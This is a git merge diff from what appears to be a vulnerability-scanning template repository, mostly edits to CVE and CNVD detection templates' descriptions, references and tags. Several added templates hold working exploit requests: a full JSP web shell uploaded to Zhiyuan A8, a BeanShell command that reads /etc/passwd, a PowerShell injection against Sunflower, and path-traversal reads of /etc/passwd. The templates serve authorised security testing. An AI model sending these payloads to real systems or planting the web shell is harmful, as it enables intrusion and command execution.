Merge remote-tracking branch 'upstream/master'

2022-03-04 10:02:02 +09:00 · 2022-03-04 10:02:02 +09:00 · 6cc02540e4
parent 8848059bee dbdfd6858a
commit 6cc02540e4
144 changed files with 1548 additions and 3360 deletions
--- a/.new-additions
+++ b/.new-additions
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@ -13,3 +13,6 @@ tags:
 # files is a list of files to ignore template execution
 # unless asked for by the user.
 files:
  - cves/2020/CVE-2020-35489.yaml
--- a/cnvd/2019/CNVD-2019-06255.yaml
+++ b/cnvd/2019/CNVD-2019-06255.yaml
@ -3,9 +3,17 @@ id: CNVD-2019-06255
 info:
  name: CatfishCMS RCE
  author: Lark-Lab
-  severity: medium
+  severity: critical
-  reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
+  description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
  remediation: Upgrade to CatfishCMS version 4.8.54 or later.
  reference:
    - https://its401.com/article/yun2diao/91344725
    - https://github.com/xwlrbh/Catfish/issues/4
  tags: rce,cnvd,catfishcms,cnvd2019
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
 requests:
  - method: GET
@ -25,3 +33,5 @@ requests:
          - 'SHELL'
          - 'USER'
        condition: and
 # Enhanced by cs on 2022/02/28
--- a/cnvd/2019/CNVD-2019-19299.yaml
+++ b/cnvd/2019/CNVD-2019-19299.yaml
@ -0,0 +1,47 @@
 id: CNVD-2019-19299
 info:
  name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
  author: daffainfo
  severity: critical
  reference:
    - https://www.cxyzjd.com/article/guangying177/110177339
    - https://github.com/sectestt/CNVD-2019-19299
  tags: zhiyuan,cnvd,cnvd2019,rce
 requests:
  - raw:
      - |
        POST /seeyon/htmlofficeservlet HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close
        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
        OPTION=S3WYOSWLBSGr
        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
        = WUghPB3szB3Xwg66 the CREATEDATE
        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
        originalFileId = wV66
        originalCreateDate = wUghPB3szB3Xwg66
        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
        needReadFile = yRWZdAS6
        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
      - |
        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
        Host: {{Hostname}}
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_1, "htmoffice operate")'
          - 'contains(body_2, "Windows IP")'
        condition: and
--- a/cnvd/2019/CNVD-2019-32204.yaml
+++ b/cnvd/2019/CNVD-2019-32204.yaml
@ -0,0 +1,23 @@
 id: CNVD-2019-32204
 info:
  name: Fanwei e-cology <= 9.0 Remote Code Execution
  author: daffainfo
  severity: critical
  description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
  reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
  tags: fanwei,cnvd,cnvd2019,rce
 requests:
  - raw:
      - |
        POST /bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
--- a/cnvd/2021/CNVD-2021-49104.yaml
+++ b/cnvd/2021/CNVD-2021-49104.yaml
@ -2,10 +2,18 @@ id: CNVD-2021-49104
 info:
  name: Pan Micro E-office File Uploads
  description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
  remediation: Pan Wei has released an update to resolve this vulnerability.
  author: pikpikcu
  severity: critical
-  reference: https://chowdera.com/2021/12/202112200602130067.html
+  reference:
    - https://chowdera.com/2021/12/202112200602130067.html
    - http://v10.e-office.cn
  tags: pan,micro,cnvd,cnvd2021
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cwe-id: CWE-434
 requests:
  - raw:
@ -36,3 +44,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by cs on 2022/02/28
--- a/cnvd/2022/CNVD-2022-03672.yaml
+++ b/cnvd/2022/CNVD-2022-03672.yaml
@ -0,0 +1,42 @@
 id: CNVD-2022-03672
 info:
  name: Sunflower Simple and Personal edition RCE
  author: daffainfo
  severity: critical
  reference:
    - https://www.1024sou.com/article/741374.html
    - https://copyfuture.com/blogs-details/202202192249158884
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
  tags: cnvd,cnvd2020,sunflower,rce
 requests:
  - raw:
      - |
        POST /cgi-bin/rpc HTTP/1.1
        Host: {{Hostname}}
        action=verify-haras
      - |
        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}
    extractors:
      - type: regex
        name: cid
        internal: true
        group: 1
        regex:
          - '"verify_string":"(.*)"'
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==200"
          - "contains(body_1, 'verify_string')"
          - "contains(body_2, 'Windows IP')"
        condition: and
--- a/cves/2004/CVE-2004-0519.yaml
+++ b/cves/2004/CVE-2004-0519.yaml
@ -35,5 +35,3 @@ requests:
          - "text/html"
 # Enhanced by mp on 2022/01/27
 # Enhanced by mp on 2022/01/27
--- a/default-logins/axis2/axis2-default-login.yaml
+++ b/default-logins/axis2/axis2-default-login.yaml
@ -1,10 +1,16 @@
-id: axis2-default-login
+id: CVE-2010-0219
 info:
-  name: Axis2 Default Login
+  name: Apache Axis2 Default Login
  author: pikpikcu
  severity: high
-  tags: axis,apache,default-login,axis2
+  description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
  tags: cve,cve2010,axis,apache,default-login,axis2
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-0219
    - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
  classification:
    cve-id: CVE-2010-0219
 requests:
  - raw:
@ -39,3 +45,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/02
--- a/cves/2010/CVE-2010-1657.yaml
+++ b/cves/2010/CVE-2010-1657.yaml
@ -5,10 +5,9 @@ info:
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1657
    - https://www.exploit-db.com/exploits/12428
    - https://www.cvedetails.com/cve/CVE-2010-1657
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1657
@ -26,4 +25,4 @@ requests:
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/02/27
--- a/cves/2010/CVE-2010-1658.yaml
+++ b/cves/2010/CVE-2010-1658.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1658
 info:
  name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12427
    - https://www.cvedetails.com/cve/CVE-2010-1658
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1658
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/02/27
--- a/cves/2010/CVE-2010-1659.yaml
+++ b/cves/2010/CVE-2010-1659.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1659
 info:
  name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12426
-    - https://www.cvedetails.com/cve/CVE-2010-1659
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-1659
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1659
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/02/28
--- a/cves/2010/CVE-2010-1714.yaml
+++ b/cves/2010/CVE-2010-1714.yaml
@ -4,7 +4,6 @@ info:
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12168
    - https://www.cvedetails.com/cve/CVE-2010-1714
@ -23,4 +22,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/02/28
--- a/cves/2010/CVE-2010-1717.yaml
+++ b/cves/2010/CVE-2010-1717.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1717
 info:
  name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12291
    - https://www.cvedetails.com/cve/CVE-2010-1717
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1717
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/01
--- a/cves/2010/CVE-2010-1718.yaml
+++ b/cves/2010/CVE-2010-1718.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1718
 info:
  name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12282
    - https://www.cvedetails.com/cve/CVE-2010-1718
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1718
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/01
--- a/cves/2010/CVE-2010-1719.yaml
+++ b/cves/2010/CVE-2010-1719.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1719
 info:
  name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12233
    - https://www.cvedetails.com/cve/CVE-2010-1719
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1719
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/01
--- a/cves/2010/CVE-2010-1722.yaml
+++ b/cves/2010/CVE-2010-1722.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1722
 info:
  name: Joomla! Component Online Market 2.x - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12177
    - https://www.cvedetails.com/cve/CVE-2010-1722
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1722
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/01
--- a/cves/2010/CVE-2010-1723.yaml
+++ b/cves/2010/CVE-2010-1723.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1723
 info:
  name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12289
    - https://www.cvedetails.com/cve/CVE-2010-1723
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1723
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/01
--- a/cves/2014/CVE-2014-9094.yaml
+++ b/cves/2014/CVE-2014-9094.yaml
@ -31,5 +31,3 @@ requests:
          - 200
 # Enhanced by mp on 2022/02/25
 # Enhanced by mp on 2022/02/25
--- a/cves/2015/CVE-2015-7297.yaml
+++ b/cves/2015/CVE-2015-7297.yaml
@ -1,11 +1,16 @@
 id: CVE-2015-7297
 info:
  name: Joomla Core SQL Injection
  author: princechaddha
  severity: high
-  description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
+  description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
-  reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
+  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7297
    - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
  tags: cve,cve2015,joomla,sqli
  classification:
    cve-id: CVE-2015-7297
 requests:
  - method: GET
@ -17,3 +22,5 @@ requests:
        words:
          - "cf79ae6addba60ad018347359bd144d2"
        part: body
 # Enhanced by mp on 2022/03/02
--- a/cves/2016/CVE-2016-3978.yaml
+++ b/cves/2016/CVE-2016-3978.yaml
@ -24,4 +24,4 @@ requests:
      - type: regex
        part: header
        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1
--- a/cves/2017/CVE-2017-9140.yaml
+++ b/cves/2017/CVE-2017-9140.yaml
@ -5,8 +5,11 @@ info:
  author: dhiyaneshDk
  severity: medium
  tags: cve,cve2017,xss,telerik
-  description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
+  description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
-  reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
+  remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
  reference:
    - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9140
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
@ -29,3 +32,5 @@ requests:
          - '#000000"onload="prompt(1)'
          - 'Telerik.ReportViewer.axd?name=Resources'
        condition: and
 # Enhanced by cs on 2022/02/28
--- a/cves/2018/CVE-2018-16716.yaml
+++ b/cves/2018/CVE-2018-16716.yaml
@ -0,0 +1,30 @@
 id: CVE-2018-16716
 info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
  tags: cve,cve2018,ncbi,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
--- a/cves/2018/CVE-2018-19365.yaml
+++ b/cves/2018/CVE-2018-19365.yaml
@ -0,0 +1,31 @@
 id: CVE-2018-19365
 info:
  name: Wowza Streaming Engine Manager Directory Traversal
  author: 0x_Akoko
  severity: high
  description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
  reference:
    - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
    - https://www.cvedetails.com/cve/CVE-2018-19365
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-19365
    cwe-id: CWE-22
  tags: cve,cve2018,wowza,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
--- a/cves/2019/CVE-2019-2767.yaml
+++ b/cves/2019/CVE-2019-2767.yaml
@ -22,6 +22,6 @@ requests:
    matchers:
      - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@ -1,16 +1,10 @@
 id: CVE-2020-13937
 info:
-  name: Apache Kylin Unauth
+  name: Apache Kylin Exposed Configuration File
  author: pikpikcu
  severity: medium
-  description: |
+  description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,  3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
    Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
    2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
    2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
    3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
    Kylin's configuration information without any authentication,
    so it is dangerous because some confidential information entries will be disclosed to everyone.
  reference:
    - https://kylin.apache.org/docs/release_notes.html
    - https://s.tencent.com/research/bsafe/1156.html
@ -45,3 +39,5 @@ requests:
          - kylin.metadata.url
        condition: and
        part: body
 # Enhanced by cs on 2022/02/28
--- a/cves/2020/CVE-2020-2096.yaml
+++ b/cves/2020/CVE-2020-2096.yaml
@ -9,6 +9,8 @@ info:
    - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
    - http://www.openwall.com/lists/oss-security/2020/01/15/1
    - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
  metadata:
    shodan-query: http.title:"GitLab"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
--- a/cves/2020/CVE-2020-26413.yaml
+++ b/cves/2020/CVE-2020-26413.yaml
@ -9,12 +9,14 @@ info:
    - https://gitlab.com/gitlab-org/gitlab/-/issues/244275
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26413
-  tags: cve,cve2020,gitlab,exposure,enum,graphql
+  metadata:
    shodan-query: http.title:"GitLab"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2020-26413
    cwe-id: CWE-200
  tags: cve,cve2020,gitlab,exposure,enum,graphql
 requests:
  - raw:
--- a/cves/2020/CVE-2020-28976.yaml
+++ b/cves/2020/CVE-2020-28976.yaml
@ -8,12 +8,12 @@ info:
  reference:
    - https://www.exploit-db.com/exploits/49189
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28976
  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2020-28976
    cwe-id: CWE-918
  tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
 requests:
  - method: GET
@ -27,4 +27,4 @@ requests:
      - type: word
        part: interactsh_protocol
        words:
-          - "http"
+          - "http"
--- a/cves/2020/CVE-2020-35234.yaml
+++ b/cves/2020/CVE-2020-35234.yaml
@ -0,0 +1,30 @@
 id: CVE-2020-35234
 info:
  name: SMTP WP Plugin Directory Listing
  author: PR3R00T
  severity: high
  description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
  remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35234
    - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
  tags: cve,cve2020,wordpress,wp-plugin,smtp
  classification:
    cve-id: CVE-2020-35234
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
      - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"
    matchers:
      - type: word
        words:
          - "debug"
          - "log"
          - "Index of"
        condition: and
 # Enhanced by cs on 2022/02/28
--- a/cves/2021/CVE-2021-1497.yaml
+++ b/cves/2021/CVE-2021-1497.yaml
@ -43,6 +43,5 @@ requests:
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
 # Enhanced by cs on 2022/02/14
 # Enhanced by cs on 2022/02/16
--- a/cves/2021/CVE-2021-22205.yaml
+++ b/cves/2021/CVE-2021-22205.yaml
@ -13,6 +13,8 @@ info:
    - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
    - https://hackerone.com/reports/1154542
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
  metadata:
    shodan-query: http.title:"GitLab"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.90
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@ -9,12 +9,14 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
    - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
    - https://docs.gitlab.com/ee/api/lint.html
-  tags: cve,cve2021,gitlab,ssrf,oast
+  metadata:
    shodan-query: http.title:"GitLab"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.60
    cve-id: CVE-2021-22214
    cwe-id: CWE-918
  tags: cve,cve2021,gitlab,ssrf,oast
 requests:
  - raw:
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@ -8,12 +8,12 @@ info:
  reference:
    - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
  tags: wordpress,cve2021,cve,lfi,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-39316
    cwe-id: CWE-22
  tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
 requests:
  - method: GET
@ -29,4 +29,4 @@ requests:
      - type: status
        status:
-          - 200
+          - 200
--- a/cves/2021/CVE-2021-41653.yaml
+++ b/cves/2021/CVE-2021-41653.yaml
@ -2,12 +2,14 @@ id: CVE-2021-41653
 info:
  name: TP-Link - OS Command Injection
-  description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
+  description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
  author: gy741
  severity: critical
  remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
  reference:
    - https://k4m1ll0.com/cve-2021-41653.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41653
    - https://www.tp-link.com/us/press/security-advisory/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
@ -43,6 +45,8 @@ requests:
    matchers:
      - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
 # Enhanced by mp on 2022/02/27
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@ -4,10 +4,12 @@ info:
  name: Apache 2.4.49 - Path Traversal and Remote Code Execution
  author: daffainfo
  severity: high
-  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+  description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  remediation: Update to Apache HTTP Server 2.4.50 or later.
  reference:
    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
